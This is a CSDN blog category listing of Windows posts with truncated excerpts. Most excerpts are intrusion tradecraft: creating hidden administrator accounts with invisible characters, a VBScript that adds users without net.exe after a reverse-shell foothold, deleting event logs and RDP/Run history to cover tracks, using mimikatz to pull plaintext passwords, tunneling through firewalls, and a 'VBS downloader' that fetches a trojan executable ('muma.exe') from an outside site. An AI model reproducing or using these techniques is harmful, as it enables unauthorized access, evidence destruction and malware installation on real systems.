![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Windows
文章平均质量分 74
asli33
这个作者很懒,什么都没留下…
展开
-
微软全系统建立隐藏账户
<br /> <br />摘要: 可以通过特殊字符建立隐藏账户:<br />1、命令行界面下不显示(显示为最后一个,但是是空白)<br />2、用户管理面板中仅显示一个用户头像,其它为空<br /> <br />详细说明:<br />可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:<br />net user 123 /add<br />net localgroup administraotrs /add<br />注意其中的空白字符.非空格.<br转载 2010-09-30 19:17:00 · 425 阅读 · 0 评论 -
HttpTunnel--穿透防火墙的利器
使用Http通道软件可以突破防火墙的限制,利用唯一Http访问的权限获得其他Internet应用。那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上,然后穿过防火墙与对方通讯,当封装的数据包到达目的地时,再将数据包还原,并将还原后的数据包转交到相应的服务器上。 http://www.http-tunnel转载 2012-03-23 13:12:54 · 1230 阅读 · 0 评论 -
How to clear windows run history
http://www.windows-commandline.com/2009/11/how-to-clear-windows-run-history.htmlWindows stores the list of the commands we have executed from Run window. This‘Run’ command history can be see转载 2012-03-30 12:27:57 · 880 阅读 · 0 评论 -
Backup / delete event log files
http://www.windows-commandline.com/2011/12/backup-delete-event-log-files.htmlWe can delete or backup event log files from command line using wmiccommands. The wmic sub command for managing eve转载 2012-03-30 12:29:08 · 611 阅读 · 0 评论 -
XP多用户登陆
1、关闭服务tasklist /svc | findstr /C:TermService,查看如果Terminal Services没有和其它服务共享svchost.exe进程则运行taskkill /F /PID process_id 关闭该进程即可,之后通过net start TermService重启服务如果Terminal Services与其它服务共享了这一进程,如原创 2012-03-30 12:26:52 · 620 阅读 · 0 评论 -
Start / Stop / Enable / Disable Terminal services from command line
http://www.windows-commandline.com/2010/10/start-terminal-services-command-line.htmlHow to start Terminal Services from command line?We can start Terminal Services from command line by runni转载 2012-03-29 11:51:03 · 1272 阅读 · 1 评论 -
winpcap静默安装小结
下面的内容基本上来自参考网站[1]、[2]、[3],做个小结免得到时候又要搜索。由于用了winpcap抓包,必须先安装它,又不想装两次exe因此考虑静默安装——silent install。1、从官方网站http://www.winpcap.org/archive/下载exe 我选用4.1.1-Winpcap.exe。2、使用7zip将exe解压,注意选择自动重命名。3转载 2012-02-27 18:23:41 · 1936 阅读 · 0 评论 -
windows神器 - mimikatz
法国佬写的神器叫 mimikatz 神器下载地址: http://blog.gentilkiwi.com/mimikatz还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章。http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwor转载 2012-02-27 12:22:16 · 1410 阅读 · 0 评论 -
免费ssh通道实现代理MyEnTunnel
使用MyEnTunnel和WinSCP连接linode上的Ubuntu服务器作者:lizongbo 发表于:17:34. 星期日, 十一月 14th, 2010版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本版权声明。http://618119.com/archives/2010/11/14/190.html先安装配置MyEnTunnel:1.My转载 2012-02-07 22:40:56 · 8318 阅读 · 0 评论 -
无net添加用户的脚本
<br />真正的无net加系统用户能用的脚本。。当我们遇到提权的时候,nc反弹提权的时候,管理员把net1和net给禁用了,,我们可以上传一个脚本,,做到真正的无net加系统用户。。脚本代码如下:<br /><br />struser=wscript.arguments(0)<br />strpass=wscript.arguments(1)<br /><br />set lp=createObject("WSCRIPT.NETWORK")<br />oz="WinNT://"&lp.Co转载 2011-04-29 11:52:00 · 1538 阅读 · 0 评论 -
Windows 系统目录简写
<br /> <br />所谓的Windows系统目录简写环境变量,就是为一些常用且固定的Windows系统目录的路径建立一个与之对应的相对简单的缩写,使之更容易输入或定位。<br /><br /> Windows系统默认情况下都是安装在电脑C盘的Windows目录下,但这并不是固定的,如果你的系统不是安装在这个目录下,那么程序想要定位你的某个系统目录的话,就需要使用到目录简写环境变量了。使用这些环境变量,程序员或系统管理员无需事先了解你的系统安装位置,就能轻易的找到所要使用的系统目录路径。<br /原创 2011-04-29 12:34:00 · 1304 阅读 · 0 评论 -
更改3389端口
1、通过注册表修改,打开“开始→运行”,输入“regedit”,打开注册表,进入以下路径: [HKEY_LOCAL_MACHINE--SYSTEM CurrentControlSet--Control--Terminal Server Wds--rdpwd--Tds--tcp],看见PortNamber值了吗?其默认值是3389,修改成所希望的端口即可,例如12345。 再打开[HKEY_L转载 2011-06-13 16:39:00 · 535 阅读 · 0 评论 -
消除mstsc的登录记录
mstsc的本地登录记录:首先建立一个记事本文件添加如下内容reg delete "HKEY_CURRENT_USER/Software/Microsoft/Terminal Server Client/Default" /va /fdel "%USERPROFILE%/My Documents/Default.rdp" /a再保存为.bat的文件。然后找到我的文档下原创 2011-06-13 14:29:00 · 2002 阅读 · 0 评论 -
Windows 2008 Server 密码获取攻略
<br /> <br />http://simeon.blog.51cto.com/18680/472570<br /> <br /> Windows 2008 Server在安全上做了重大调整使用过去的老路子行不通,Gethash可能根本运行不了。本人通过实践找到一种组合的破解方法。下面是工作思路和流程:<br /><br /> 1.获取shell并提权。在服务器上添加一个管理员用户。<br /><br /> 2.下载saminside2.6.5版本到服务器上面。授权该软件以转载 2011-02-28 17:51:00 · 492 阅读 · 0 评论 -
VBS下载者
一、VBS下载者:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://www.03389.com/muma.exe",0Post.Send()Set aGet = CreateObject("ADODB.Stream")转载 2013-11-13 16:34:31 · 797 阅读 · 0 评论